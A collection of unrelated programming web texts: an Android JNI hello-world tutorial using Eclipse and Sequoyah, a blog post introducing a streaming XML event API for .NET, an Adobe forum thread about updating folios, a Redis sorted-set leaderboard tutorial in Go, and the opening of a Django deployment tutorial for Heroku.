This guide shows how to create a sample (Hello World style) Android JNI application. Using Eclipse and Sequoyah, you can do everything inside the Eclipse IDE (there's no need to run annoying command lines from a Console or DOS prompt).
You should complete the previous guide first in order to follow this one. There is a bit of overlap with the previous guide, so you can skip to Step 4 if you have already done it.
Step 1. Create a New Android project.
Select an API level of at least 9. Do not use a space in the project name, or the Android NDK may complain later.
Step 2. Add Native Support
This is where Sequoyah does its work.
Right click the project on Eclipse Workspace, then select Android Tools -> Add Native Support.
This dialog should come up:
Just leave the default values as they are. Sequoyah will add native support to the project, with an Android.mk and a .cpp file under the jni folder.
Step 3. Build Project
The cpp file is empty right now, but we're finally ready to test building something. So do Build Project and hold your breath.
Examine the Eclipse Console window. You should see something like this:
[c] **** Build of configuration Default for project TestJNI ****
bash C:\android-ndk-r5c\ndk-build V=1
cygwin warning: MS-DOS style path detected: C:\PERMADI_WORKSPACE\Test
**** [/c]
If there's any error, make sure that your Android NDK environment is set up correctly before continuing.
Step 5. Open up the Activity class.
Should look like below:
[c] package com.permadi.testJNI;

import android.app.Activity;
import android.os.Bundle;

public class TestJNIActivity extends Activity
{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
    }
} [/c]
Step 6. Add a function which we will implement natively in C++.
Let’s call it stringFromJNICPP() just because I feel like it.
[c] package com.permadi.testJNI;

import android.app.Activity;
import android.os.Bundle;

public class TestJNIActivity extends Activity
{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
    }

    public native String stringFromJNICPP();
} [/c]
Step 7. Load the native library.
[c] package com.permadi.testJNI;

import android.app.Activity;
import android.os.Bundle;

public class TestJNIActivity extends Activity
{
    //... same as above

    static
    {
        System.loadLibrary("TestJNI");
    }
} [/c]
How did I come up with that name (TestJNI)? The name is arbitrary, but it should match the LOCAL_MODULE specified in jni/Android.mk, and it should not contain special characters.
[c] LOCAL_PATH := $(call my-dir)

include $(CLEAR_VARS)

LOCAL_MODULE := TestJNI

### Add all source file names to be included in lib separated by a whitespace
LOCAL_SRC_FILES := TestJNI.cpp

include $(BUILD_SHARED_LIBRARY) [/c]
Step 8. Add a TextView to display the message so that we can see that the native method is actually being called.
Here's my main.xml (the layout attributes are the usual defaults; what matters is the TextView with id myTextField):
[c] <?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:orientation="vertical"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent">
    <!-- The TextView that will display the string returned from the native code. -->
    <TextView
        android:id="@+id/myTextField"
        android:layout_width="fill_parent"
        android:layout_height="wrap_content" />
</LinearLayout> [/c]
Then I set the content of the TextView to the string returned by the stringFromJNICPP() function.
My Activity class looks like this now (note where I call the CPP function and print the return value into the text field):
[c] package com.permadi.testJNI;

import android.app.Activity;
import android.os.Bundle;
import android.widget.TextView;

public class TestJNIActivity extends Activity
{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        TextView myTextField = (TextView)findViewById(R.id.myTextField);
        myTextField.setText(stringFromJNICPP());
    }

    public native String stringFromJNICPP();

    static
    {
        System.loadLibrary("TestJNI");
    }
} [/c]
Step 9. Add the native C++ code.
Open jni/TestJNI.cpp (this file should have been created for you by Step 2) and add this code.
[c] #include <string.h>
#include <jni.h>
#include <android/log.h>

extern "C"
{
    JNIEXPORT jstring JNICALL Java_com_permadi_testJNI_TestJNIActivity_stringFromJNICPP(JNIEnv * env, jobject obj);
};

JNIEXPORT jstring JNICALL Java_com_permadi_testJNI_TestJNIActivity_stringFromJNICPP(JNIEnv * env, jobject obj)
{
    return env->NewStringUTF("Hello From CPP");
} [/c]
The code simply returns a string saying Hello From CPP.
Notice how the function is named and how it needs to be exported with C linkage (the extern "C" block), because the Android NDK mostly works with C.
Now, you might think that the function name is insanely long, but it isn't arbitrary: it follows a convention that tells JNI how to resolve which Java method it implements. The convention is roughly: the word Java_, followed by your Java package name with every dot replaced by an underscore, followed by an underscore, then the class name, followed by an underscore and the function name. Confused? Here's an excerpt from the Java documentation:
Resolving Native Method Names
Dynamic linkers resolve entries based on their names. A native method name is concatenated from the following components:
the prefix Java_
a mangled fully-qualified class name
an underscore (“_”) separator
a mangled method name
for overloaded native methods, two underscores (“__”) followed by the mangled argument signature
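Applied to this project, those pieces line up exactly with the name used in the code above (no overloaded-method suffix is needed, since there is only one stringFromJNICPP):
[c] Java side:   package com.permadi.testJNI, class TestJNIActivity, method stringFromJNICPP()
Native side: Java_ + com_permadi_testJNI + _TestJNIActivity + _stringFromJNICPP
             = Java_com_permadi_testJNI_TestJNIActivity_stringFromJNICPP [/c]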
Step 10. Create a Test Device.
Before testing, I recommend creating a new AVD that is compatible with API level 9 (if you don't already have one), since the latest NDK recommends this level. If you don't know how to create an AVD, see the Android documentation. You can also test on a real device (I have personally run this example on a Nexus One phone).
When running, make sure that you select this AVD via Run->Run Configurations->Target.
Step 11. Build it.
Build the project from Eclipse (from the menu: Project->Build Project). This builds both the Java and C/C++ source files and installs the resulting native library into the package in one step. If you were expecting to have to deal with command lines, it's a nice surprise that you don't need to!
Make sure that the Eclipse Console is open (menu: Window->Show View->Console). With luck, there should be no errors. If there are, head over to the Common Errors section below.
Step 12. Run it.
Voila, here it is.
Download example project.
Common Errors
Error
[c] Multiple markers at this line
- Method 'NewStringUTF' could not be resolved
- base operand of '->' has non-pointer type '_JNIEnv' [/c]
Solution: You are probably using the C convention inside a CPP file. In general, the difference is shown below:
C:
[c] (*env)->NewStringUTF(env, "Hello From C"); [/c]
C++
[c] env->NewStringUTF("Hello From CPP"); [/c]
Error
[c] 07-09 07:47:31.103: ERROR/AndroidRuntime(347): FATAL EXCEPTION: main
07-09 07:47:31.103: ERROR/AndroidRuntime(347): java.lang.UnsatisfiedLinkError: stringFromJNI_CPP [/c]
Solution:
- Do not use underscores in JNI function names (an underscore in the Java method name has to be escaped as _1 in the native function name).
- Are you loading the right library name?
Error
[c] multiple definition of `Java_com_permadi_testJNI_TestJNIActivity_stringFromJNI'  com_permadi_testJNI_TestJNIActivity.c  /TestJNI/jni  line 5  C/C++ Problem
first defined here  TestJNI  line 5, external location: C:\PERMADI_WORKSPACE\TestJNI\obj\local\armeabi\objs\TestJNI\com_permadi_testJNI_TestJNIActivity.o:C:\PERMADI_WORKSPACE\TestJNI\jni\com_permadi_testJNI_TestJNIActivity.c  C/C++ Problem
make: *** [/cygdrive/c/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/libTestJNI.so] Error 1  TestJNI  C/C++ Problem [/c]
or
[c] C:/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/objs/TestJNI/com_permadi_testJNI_TestJNIActivity.o: In function `Java_com_permadi_testJNI_TestJNIActivity_stringFromJNI':
C:/PERMADI_WORKSPACE/TestJNI/jni/com_permadi_testJNI_TestJNIActivity.c:5: multiple definition of `Java_com_permadi_testJNI_TestJNIActivity_stringFromJNI'
C:/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/objs/TestJNI/com_permadi_testJNI_TestJNIActivity.o:C:/PERMADI_WORKSPACE/TestJNI/jni/com_permadi_testJNI_TestJNIActivity.c:5: first defined here
collect2: ld returned 1 exit status
make: *** [/cygdrive/c/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/libTestJNI.so] Error 1 [/c]
Possible solution:
- Make sure there are no duplicate function names.
- Check Android.mk to ensure that no source file is being compiled multiple times. For instance, at some point my makefile was messed up like this, with one of the source files (com_permadi_testJNI_TestJNIActivity.c) added twice, which caused the error.
[c] LOCAL_PATH := $(call my-dir)

include $(CLEAR_VARS)

LOCAL_MODULE := TestJNI

### Add all source file names to be included in lib separated by a whitespace
LOCAL_SRC_FILES := TestJNI.cpp com_permadi_testJNI_TestJNIActivity.c com_permadi_testJNI_TestJNIActivity.c

include $(BUILD_SHARED_LIBRARY) [/c]
Error
[c] Description                                  Resource                               Path           Location  Type
Method 'NewStringUTF' could not be resolved  com_permadi_testJNI_TestJNIActivity.c  /TestJNIC/jni  line 6    Semantic Error
Type 'JNIEnv' could not be resolved          com_permadi_testJNI_TestJNIActivity.c  /TestJNIC/jni  line 4    Semantic Error
Type 'jobject' could not be resolved         com_permadi_testJNI_TestJNIActivity.c  /TestJNIC/jni  line 4    Semantic Error
Type 'jstring' could not be resolved         com_permadi_testJNI_TestJNIActivity.c  /TestJNIC/jni  line 4    Semantic Error [/c]
Solution:
This is actually a very strange error, because I have seen it suddenly crop up in projects that had compiled fine before. There must be a bug somewhere (in Eclipse, the NDK, the SDK?) which causes this to happen in some situations and intermittently, and I don't know what triggers it. The remedy (hack) is to add the android-ndk include path to the project's C/C++ paths.
Open the Project Properties. Expand the C/C++ General section, then select the Paths and Symbols sub-section. In the Includes tab, select GNU C and enter the android-ndk include path.
Do the same for the GNU C++ section. Click Apply. Agree when asked to rebuild the index. Then rebuild the project. The error is magically gone. What's odd is that once the build is successful, you can remove the paths that you have just added, make code changes that trigger a recompile, and the error usually won't come back.
Where to go from here
Examine the NDK sample code and see how things work. There are OpenGL samples if you're into game programming, and you can compile them within Eclipse too.
Sorry, I meant to ask, is there a particular reason for the "Select an API level of at least 9" requirement?
Does something bad happen if level 8 is used?
According to the Google documentation, "Applications that use native activities must be run on Android 2.3 or later." This is why the example uses API level 9.
Nice tutorial, I had the same problem with jobject/JNIEXPORT/etc. and I’m glad I found the answer here.
Source: http://permadi.com/blog/2011/09/creating-your-first-android-jnindk-project-in-eclipse-with-sequoyah/
An alternative API for performant streaming XML processing: XSE (Xml Streaming Events)
Note: this entry has moved.
As a followup to my previous posts (part I and part II), I have been thinking about whether there's a way to completely avoid the cost intrinsically associated with XPath, that is, the need to load a complete XML document in memory (be it an XmlDocument or an XPathDocument, it's basically the same problem). Of course there's a way, I can almost hear you say: use an XmlReader! There are a lot of scenarios where it makes perfect sense to do so. However, I've (unfortunately) found that most developers get easily tired of writing the same code performing the Read() calls, endless switch/if statements checking the current reader's Depth, maintaining flags to signal processed elements (basically building a primitive state machine, which is required whenever you need more flexibility than a simple element name/namespace lookup), and so on.
Typical code looks pretty ugly. For example, imagine I wanted to count the number of items I have viewed recently with RssBandit (by querying the file used by its cool Remote Storage feature). The corresponding XPath expression would be:
count(/r:feeds/r:feed/r:stories-recently-viewed/r:story), where xmlns:r="". Pretty simple to use with an XPathNavigator or XmlDocument, right? Well, the unbeatable-fast approach looks acceptably bad:
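Something along these lines (a sketch of the pattern, using the element names from the expression above; the namespace check is left out since the URI isn't shown here):

// Hand-rolled XmlReader counting: a primitive state machine built out of bool flags.
int count = 0;
bool inFeeds = false, inFeed = false, inRecentlyViewed = false, inStory = false;
XmlTextReader reader = new XmlTextReader("feeds.xml");
while (reader.Read())
{
    if (reader.NodeType == XmlNodeType.Element)
    {
        if (reader.LocalName == "feeds") inFeeds = true;
        else if (inFeeds && reader.LocalName == "feed") inFeed = true;
        else if (inFeed && reader.LocalName == "stories-recently-viewed") inRecentlyViewed = true;
        else if (inRecentlyViewed && reader.LocalName == "story") { inStory = true; count++; }
    }
    else if (reader.NodeType == XmlNodeType.EndElement)
    {
        if (reader.LocalName == "story") inStory = false;
        else if (reader.LocalName == "stories-recently-viewed") inRecentlyViewed = false;
        else if (reader.LocalName == "feed") inFeed = false;
        else if (reader.LocalName == "feeds") inFeeds = false;
    }
}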
In case you doubt my word that this IS the fastest approach, here are the numbers, for a 77kb file, where I didn't measure the time it takes to pre-compile the XPath expression:
XmlTextReader: 28
XPathDocument: 562
Now imagine that you also need to build stats about dc:creator (where xmlns:dc=""), you have to process xmlns:trackback="" elements, etc. Well, most probably, you will give up on the unbeatable-fast approach, load an XPathDocument (I hope), and start executing pre-compiled XPathExpression instances against it. It's my personal experience that not even the example I showed above is tackled with the XmlReader approach. Believe me, I've seen developers load an XmlDocument just to issue an //Error (?!) XPath query just to determine if there was an error after some processing!! Unfortunately, except for the most simple cases, using the XmlReader is pretty difficult and leads to code that is hard to maintain and extend.
What's more, there are a LOT of scenarios where there's not even a chance to know ahead of time what needs to be processed. For example, think about a webservice that receives a multi-namespaced XML file and processes information items from each namespace with different modules, specified through configuration. You want one example? RSS: there are a bunch of namespaces that can go in there. The same goes for any other service that allows extensibility through namespaces, such as SOAP. Another example is XPath-based rule languages (one such is Schematron). But not only complex cases apply here; even loading deeply nested configuration files is extremely cumbersome without the help of XPath or XmlSerializer.
Alternatives in alternate worlds: SAX?
Java developers would say: "if you only had SAX...". Well, I'm no experienced Java developer, so if there's anybody out there reading this: first, you're in the wrong place; second, feel free to correct me in this section. In order to get a good feeling for what we are missing with SAX, I downloaded one cool (I thought it was, at least) piece of Java code, SAX creator David Megginson's RdfFilter, which is a concrete use case of SAX2-based processing and extensibility for handling XML. First let me say that I doubt most Java developers take the approach of creating such a cool XMLFilterImpl (the SAX filters that expose events in a more usable way to the developer) for regular needs. However, it does show what SAX-based programming looks like. Guess what, it doesn't look very different than XmlReader:
I removed comments to clarify the code. Of course, it has a cooler state machine than our example's 4 bool variables, but you get the idea. Looking at this code, however, I learned a cool thing about SAX: specialized filters can expose more specific events than startElement, and that would make the client code far easier to write. However, most Java developers (again, correct me if I'm wrong, but I only asked a couple of them) simply create a new empty filter and implement the methods they are interested in, more often than not with much less elegance than the code above. Just the quick and dirty way to get the job done. That leads, of course, to code that is just as difficult to maintain and extend as the XmlReader approach.
The idea of having a specialized strategy (a filter in SAX) process and expose higher-level events is appealing. The developer of this strategy could have optimized the state machine it uses, has already debugged the code, etc. However, the strategy has to be manually created, and it only serves the single purpose it was created for. For example, there's no way we can use the RdfFilter to help us process anything other than RDF (of course we can still get the lower-level SAX events, but how useful is that?).
Enter the XSE: Xml Streaming Events
The solution I'm thinking of (and actively coding) is based on an improvement over SAX and the XmlReader. The main requirements are:
- Streaming processing: I don't want to pay the price of full XML loading.
- Support for dynamic expressions: I don't want to code a new filter/strategy/handler/whatever class for each new type of element to match.
- Callbacks for matched/subscribed elements: I just want to get called when something I'm interested in is found. For example, it's completely useless for me to get called by an ElementStarted event when the element is not in the namespace I expect (or the path, or has the attribute, or...).
- Compiled code: the price to support dynamic expressions shouldn't be performance. I want the same performance I can get by manually coding the ugliest switch statement required to get the job done, FAST.
- Support for pre-compilation and reuse of expressions: I want to increase performance by caching and thread-safely reusing expressions I know ahead of time.
Given the first requirement, it's pretty obvious that the solution will be XmlReader-based. The following are a number of code samples showing usage of XSE in Whidbey (I've back-ported to v1.x too, don't worry):
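In rough strokes, usage looks like this (the factory type and handler signature below are illustrative; only XseReader and AddHandler are named further down in this post):

// Illustrative sketch only: the exact signatures are not spelled out here.
int count = 0;
XseReader xse = new XseReader(new XmlTextReader("feeds.xml"));

// The factory compiles the expression into a matching strategy; the anonymous method
// is the callback that fires for every matched element while the document streams by.
xse.AddHandler(
    XPathSubsetFactory.Create("/r:feeds/r:feed/r:stories-recently-viewed/r:story"),
    delegate { count++; });

while (xse.Read()) { }   // a single forward-only pass; no in-memory document is built

Console.WriteLine(count);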
The "strange" syntax following the delegate keyword is the new SUPER cool anonymous methods feature of C# v2. Equivalent v1.x code only needs to change that single line to use a regular named delegate method instead.
If you want to process all elements in a certain namespace (let's say, the Dublin Core), irrespective of its location, you would use something like this:
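Along these lines (again, the factory name is illustrative, and the Dublin Core namespace URI is an assumption):

// Illustrative: match every element in the Dublin Core namespace, wherever it appears.
int dcCount = 0;
xse.AddHandler(
    NamespaceFactory.Create("http://purl.org/dc/elements/1.1/"),
    delegate { dcCount++; });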
The compiled strategy can be cached statically and reused by multiple threads simultaneously, as a call to XseReader.AddHandler performs a Clone on it.
By now you may have realized that the real secret of all this are the concrete factories. Each factory is able to create strategies to match a specific expression language. The two I showed are XPath-like or subsets of it. You can even come up with your own expression format, given you provide an appropriate factory for it.
You may have noted that the expression from the last example above is not valid according to XPath syntax. The equivalent in XPath would be dc:*. If you wanted to process all elements from all namespaces, my syntax is simply *. And to process an element named item from any namespace, you use *:item instead of the XPath *[local-name()='item'].
The most important piece here is what the strategy returned from the factory looks like. Well, for the two factories above, what I basically did is analyze the expression and emit the ugliest-unbeatable-fast-if-else implementation you can think of. Almost exactly the one I showed at the beginning. Now for the numbers, which are the main reason I started this project:
Everett:
XmlTextReader: 28
XseReader: 38
XPathDocument: 562
Whidbey:
XmlTextReader: 18
XseReader: 23
XPathDocument: 478
XPathDocument2: 234
These are the tests for each approach, against the story count test expression discussed at the beginning. Quite impressive, right? Note that even though XPathDocument2 in Whidbey does a superb job at improving on XPathDocument performance, it's still an order of magnitude slower than the XSE approach. Here we can also appreciate the good work of the XML team in improving even the raw XML parser by an important percentage (28 vs 18, wow). That directly benefits XSE too. The tests were as fair as I could make them: all XPath expressions are precompiled, the XmlNameTable is pre-cached, etc. I made the biggest effort to make the XPath numbers do better, but that's honestly its limit. When I post the test code, you'll believe me, hopefully ;).
The code is being polished now, and I'm trying to come up with more factories that may be useful, especially adding attribute and child element value evaluation, but that requires a little bit more work to achieve with only a reader at hand :o). I'm also trying to use direct Reflection.Emit instead of CodeDom for compiling the strategy, but I still have to measure the perf. improvement that would yield in expression compilation. You can infer that caching the compiled strategy (just like XPathExpressions, but much more so in this case) greatly improves performance. I haven't implemented an internal strategy cache yet, which would also help there.
I'm doing some major rearrangements in my NMatrix opensource project so that I can concentrate all my XML-related efforts in a single NMatrix.Xml assembly, such as Schematron.NET, XSE and others.
As you can see, flexibility and performance are two cornerstones of this approach. I wanted both, and I think it delivers. In the upcoming posts I will discuss how it's implemented, and I welcome everyone interested in improving it or making suggestions to comment on this post, so that we can finally say to Java developers: "If you only had XSE...".
Update: read the follow-up posts.
Source: http://weblogs.asp.net/cazzu/XseIntro
Hello,
we built an app with the Viewer Builder yesterday. Our folios were shown correctly in the development app.
Then we made one update yesterday afternoon and another today, after installing the new Folio Builder panel (not the Folio Producer tools).
We get correctly updated folios in the Content Viewer on the iPad, but no update in the development app.
After updating the Viewer Builder we rebuilt the app (now V19), but it didn't solve the problem.
The folios in the Content Viewer are still okay.
What can we do?
Neele
I am in exactly the same situation.
Updated folios are displayed when testing in the Content Viewer.
Export from the Folio Producer.
Import the updated file into the "manage" view of the Viewer Builder.
Drag into iTunes - the content of the app remains as before - no update.
How do I test this to upload to the store - I'm happy with it in the Content Viewer!
Please help - I'm on a deadline!
;-)
SORTED!
and I feel like an idiot!
In the Folio Producer, near the Export button, there is a button marked "UPDATE". Press this and your folios will be updated!
Follow the rest of the steps and the update appears!
Doh!!
Posted this just in case there is anyone else out there who can't see the "UPDATE" button!
Source: https://forums.adobe.com/message/4340792?tstart=0
Implement game leaderboard using Redis
This is the Third Post in The Redis Series.
Part One: Install Redis inside Ubuntu VM
Part Two: Redis Persistence by Example
Part Three: Implement game leaderboard using Redis 👈
Part Four: Implement Job Queue using Redis
Part Five: Building REST API backed by Redis
Part Six: Building Chat Service in Golang and Websockets backed by Redis
Part Seven: Redis Cluster configurations by example
Part Eight: Redis Geospatial by example
In this post, we will talk about the Sorted Set and some of its operations, first working with sorted sets in the redis-cli client and then switching to Golang to implement simple game scoring using Redis. In the end, we will compare the performance of running against Redis in RDB and AOF storage modes.
Let’s know about the Sorted Set data structure in Redis
A Sorted Set is like the Set data structure in that it contains non-repeating elements. However, it is different in that each member is associated with a score.
Sorted set commands start with the Z character.
For the sake of this example, we need to focus on the following commands:
ZADD: Adds all the specified members with the specified scores to the sorted set stored at key.
ZCARD: Get number of members in a sorted set (cardinality)
ZINCRBY: Increments the score of a member in the sorted set stored at key by the given increment.
ZSCORE: Returns the score associated with a given member in a sorted set.
ZRANGE: Returns the specified range of elements in the sorted set stored at key, and takes WITHSCORES to return the scores as well.
ZREVRANGE: Similar to ZRANGE, but returns the elements ordered from the highest to the lowest score.
You can read more about other sorted set commands in the documentation.
Working with redis-cli
Let's try sorted set operations in redis-cli. First, make sure you have installed Redis as specified in the first post in this series.
Now let’s connect to the VM using vermin, you might need to start the VM if it is not started:
$ vermin ps -a
VM NAME IMAGE CPUS MEM DISK TAGS
vm_01 ubuntu/focal 1 1024 2.8GB redis
Then start the VM if it is not running:
$ vermin start vm_01
Now, let's ssh into the VM and start redis-cli:
$ vermin ssh vm_01
✔ Establishing connection
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)
Last ...
...
vermin@verminbox:~$ redis-cli
127.0.0.1:6379>
Let’s work with the sorted set commands as follows:
127.0.0.1:6379> zadd myss 10 Java 20 Redis 30 GO
(integer) 3
This command added 3 elements to the sorted set myss, "Java" with score 10, then "Redis" with score 20, and finally "GO" with score 30.
Now let’s increment the score of Redis by 1:
127.0.0.1:6379> ZINCRBY myss 1 Redis
"21"
Now let's show the sorted set elements along with their scores:
127.0.0.1:6379> zrange myss 0 -1 WITHSCORES
1) "Java"
2) "10"
3) "Redis"
4) "21"
5) "GO"
6) "30"
Note: the ZRANGE command takes as its first parameter the key, then the start index, and then the stop index (0 and -1, where -1 means the last index); finally, WITHSCORES returns the elements along with their scores.
We could use ZREVRANGE to get the elements sorted by score.
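With the data above, it lists the highest score first:
127.0.0.1:6379> ZREVRANGE myss 0 -1 WITHSCORES
1) "GO"
2) "30"
3) "Redis"
4) "21"
5) "Java"
6) "10"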
And we can verify that we have 3 elements using the ZCARD myss command.
Implementing the game scoring in go
Next, we will implement simple game scoring using Golang and the go-redis library.
I run the application on my macOS desktop; however, Redis is running inside the VM, so I have to do port forwarding to access the port from my local macOS desktop. In a new terminal, write:
$ vermin port vm_01 6379
Connected. Press CTRL+C anytime to stop
I am using Intellij/Golang but any IDE can be used.
Here’s the source code:
package main
import (
"fmt"
"github.com/go-redis/redis/v7"
"log"
"math/rand"
"time"
)
func init() {
rand.Seed(time.Now().Unix())
}
const key = "players"
func main() {
c := redis.NewClient(&redis.Options{
Addr: "localhost:6379",
})
c.Del(key) // remove the key from redis for clean start
for i := 0; i < 10000; i++ {
player := getWinnerPlayer()
err := c.ZIncr(key, &redis.Z{
Score: 1,
Member: player,
}).Err()
if err != nil {
log.Fatal(err)
}
}
result, _ := c.ZRevRangeWithScores(key, 0, -1).Result()
fmt.Println(result)
}
func getWinnerPlayer() string {
players := []string{"Mohammad", "Ali", "John", "Abdullah", "Farida"}
return players[rand.Intn(len(players))]
}
First, we create a client for Redis. Then we call the getWinnerPlayer() function, which simulates a winner among the 5 players we have. Then we call ZIncr to increment the score of the selected player by 1; we do this 10000 times. At the end, we call ZRevRangeWithScores to get the members and their scores, sorted by score.
I got the following result; however, you might get a different one:
$ go build; time ./redis-go
[{2033 John} {2030 Ali} {2002 Abdullah} {1981 Mohammad} {1954 Farida}]
./redis-go 0.32s user 0.41s system 15% cpu 4.570 total
Comparing Performance:
In this part, we will compare the performance of RDB vs. AOF, so it is good to go and read the second part of this series before continuing, to get some context.
By default, Redis runs in RDB mode (snapshotting), so running the 10000 commands took around 4.5 seconds, as shown above.
Now let's change the configuration to use AOF and set the fsync policy to always (so the log is synced every time a new command is appended):
127.0.0.1:6379> config set appendonly yes
OK
127.0.0.1:6379> config set appendfsync always
OK
127.0.0.1:6379> config rewrite
OK
Now let’s run the previous program and compare the results:
go build; time ./redis-go
[{2089 Mohammad} {2001 John} {1986 Farida} {1968 Ali} {1956 Abdullah}]
./redis-go 0.33s user 0.41s system 6% cpu 11.174 total
Ohh, it is around 11 seconds, which is about 3 times slower than running with RDB only enabled.
If we enable AOF with the default fsync policy, which is every second, we get performance comparable to running with RDB only (snapshotting).
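Switching back is the same kind of configuration change (everysec is the default AOF fsync policy):
127.0.0.1:6379> config set appendfsync everysec
OK
127.0.0.1:6379> config rewrite
OK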
Resources:
Command reference - Redis (redis.io)
Data types - Redis (redis.io)
Source: https://mohewedy.medium.com/implement-game-scoring-using-redis-75660f739760?source=post_internal_links---------1----------------------------
As a novice web developer, you’ve built your portfolio app and shared your code on GitHub. Perhaps, you’re hoping to attract technical recruiters to land your first programming job. Many coding bootcamp graduates are likely doing the same thing. To differentiate yourself from the crowd and boost your chances of getting noticed, you can start hosting your Django project online.
For a hobby Django project, you’ll want a hosting service that’s free of charge, quick to set up, user-friendly, and well-integrated with your existing technology stack. While GitHub Pages is perfect for hosting static websites and websites with JavaScript, you’ll need a web server to run your Flask or Django project.
There are a few major cloud platform providers operating in different models, but you’re going to explore Heroku in this tutorial. It ticks all the boxes—it’s free, quick to set up, user-friendly, and well-integrated with Django—and is the favorite cloud platform provider of many startups.
In this tutorial, you’ll learn how to:
- Take your Django project online in minutes
- Deploy your project to Heroku using Git
- Use a Django-Heroku integration library
- Hook your Django project up to a standalone relational database
- Manage the configuration along with sensitive data
To follow along, you can download the code and other resources by clicking the link below:
Get Source Code: Click here to get the companion Django project as well as snapshots of the individual steps followed in this tutorial.
Demo: What You’ll Build
You’re going to create a bare-bones Django project and deploy it to the cloud straight from the terminal. By the end, you’ll have a public and shareable link to your first Heroku app.
Here’s a one-minute video demonstrating the necessary steps, from initializing an empty Git repository to viewing your finished project in the browser. Hang on and watch till the end for a quick preview of what you’re about to find in this tutorial:
In addition to the steps shown in the screencast above, you’ll find a few more later on, but this should be enough to give you a general idea about how you’ll be working with Heroku in this tutorial.
Project Overview
This tutorial isn’t so much about building any particular project, but rather hosting one in the cloud using Heroku. While Heroku supports various languages and web frameworks, you’ll stick to Python and Django. Don’t worry if you don’t have any Django projects on hand. The first step will walk you through scaffolding a new Django project to get you started quickly. Alternatively, you can use a ready-made sample project that you’ll find later.
Once you have your Django project ready, you’re going to sign up for a free Heroku account. Next, you’ll download a convenient command-line tool that will help you manage your apps online. As demonstrated in the screencast above, the command line is a quick way of working with Heroku. Finally, you’ll finish off with a deployed Django project hosted on your newly-configured Heroku instance. You can think of your final result as a placeholder for your future project ideas.
Prerequisites
Before jumping ahead, make sure that you’re familiar with the basics of the Django web framework and that you’re comfortable using it to set up a bare-bones project.
Note: If you’re more experienced with Flask than Django, then you can check out a similar tutorial about Deploying a Python Flask Example Application Using Heroku.
You should also have a Git client installed and configured so that you can interact conveniently with the Heroku platform from the command line. Finally, you should seriously consider using a virtual environment for your project. If you don’t already have a specific virtual environment tool in mind, you’ll find some options in this tutorial soon.
Step 1: Scaffold a Django Project for Hosting
To host a Django web application in the cloud, you need a working Django project. For the purposes of this tutorial, it doesn’t have to be elaborate. Feel free to use one of your hobby projects or to build a sample portfolio app if you’re short on time, and then skip ahead to creating your local Git repository. Otherwise, stick around to make a brand new project from scratch.
Create a Virtual Environment
It’s a good habit to start every project by creating an isolated virtual environment that won’t be shared with other projects. This can keep your dependencies organized and help avoid package version conflicts. Some dependency managers and packaging tools like Pipenv or poetry automatically create and manage virtual environments for you to follow best practices. Many IDEs like PyCharm do this by default, too, when you’re starting a new project.
However, the most reliable and portable way of creating a Python virtual environment is to do it manually from the command line. You can use an external tool such as virtualenvwrapper or call the built-in venv module directly. While virtualenvwrapper keeps all environments in a predefined parent folder, venv expects you to specify a folder for every environment separately.
You'll be using the standard venv module in this tutorial. It's customary to place the virtual environment in the project root folder, so let's make one first and change the working directory to it:
$ mkdir portfolio-project
$ cd portfolio-project/
You're now in the portfolio-project folder, which will be the home for your project. To create a virtual environment here, just run the venv module and provide a path for your new environment. By default, the folder name will become the environment's name. If you want to, you can instead give it a custom name with the optional --prompt argument:
$ python3 -m venv ./venv --prompt portfolio
A path starting with a leading dot (.) indicates that it's relative to the current working directory. While not mandatory, this dot clearly shows your intent. Either way, this command should create a venv subdirectory in your portfolio-project root directory:
portfolio-project/
│
└── venv/
This new subdirectory contains a copy of the Python interpreter along with a few management scripts. You’re now ready to install project dependencies into it.
Install Project Dependencies
Most real-life projects depend on external libraries. Django is a third-party web framework and doesn’t ship with Python out-of-the-box. You must install it along with its own dependencies in your project’s virtual environment.
Don't forget to activate your virtual environment if you haven't already. To do so, you'll need to execute the commands in one of the shell scripts available in the virtual environment's bin/ subfolder. For example, if you're using Bash, then source the activate script:
$ source venv/bin/activate
The shell prompt should now display a prefix with your virtual environment's name to indicate it's activated. You can double-check which executables the specific commands are pointing to:
(portfolio) $ which python
/home/jdoe/portfolio-project/venv/bin/python
The above output confirms that running python will execute the corresponding file located in your virtual environment. Now, let's install the dependencies for your Django project.
You’ll need a fairly recent version of Django. Depending on when you’re reading this, there might be a newer version available. To avoid potential compatibility problems, you may want to specify the same version as the one used at the time of writing this tutorial:
(portfolio) $ python -m pip install django==3.2.5
This will install the 3.2.5 release of Django. Package names are case insensitive, so it doesn't matter whether you type django or Django, for example.
Note: Sometimes, you'll see a warning about a newer version of pip being available. It's usually harmless to ignore this warning, but you'll need to consider upgrading for security reasons if you're in a production environment:
(portfolio) $ python -m pip install --upgrade pip
Alternatively, you can disable the version check in the configuration file if it’s bothering you and you’re aware of the possible consequences.
Installing Django brings a few additional transitive dependencies, which you can reveal by listing them:
(portfolio) $ python -m pip list
Package    Version
---------- -------
asgiref    3.4.1
Django     3.2.5
pip        21.1.3
pytz       2021.1
setuptools 56.0.0
sqlparse   0.4.1
Since you want others to be able to download and run your code without problems, you need to ensure repeatable builds. That’s what freezing is for. It outputs roughly the same set of dependencies with their sub-dependencies in a special format:
(portfolio) $ python -m pip freeze
asgiref==3.4.1
Django==3.2.5
pytz==2021.1
sqlparse==0.4.1
These are essentially the arguments to the pip install command. However, they're usually encapsulated within one or more requirements files that pip can consume in one go. To create such a file, you can redirect the output of the freeze command:
(portfolio) $ python -m pip freeze > requirements.txt
This file should be committed to your Git repository so that others can install its contents using pip in the following way:
(portfolio) $ python -m pip install -r requirements.txt
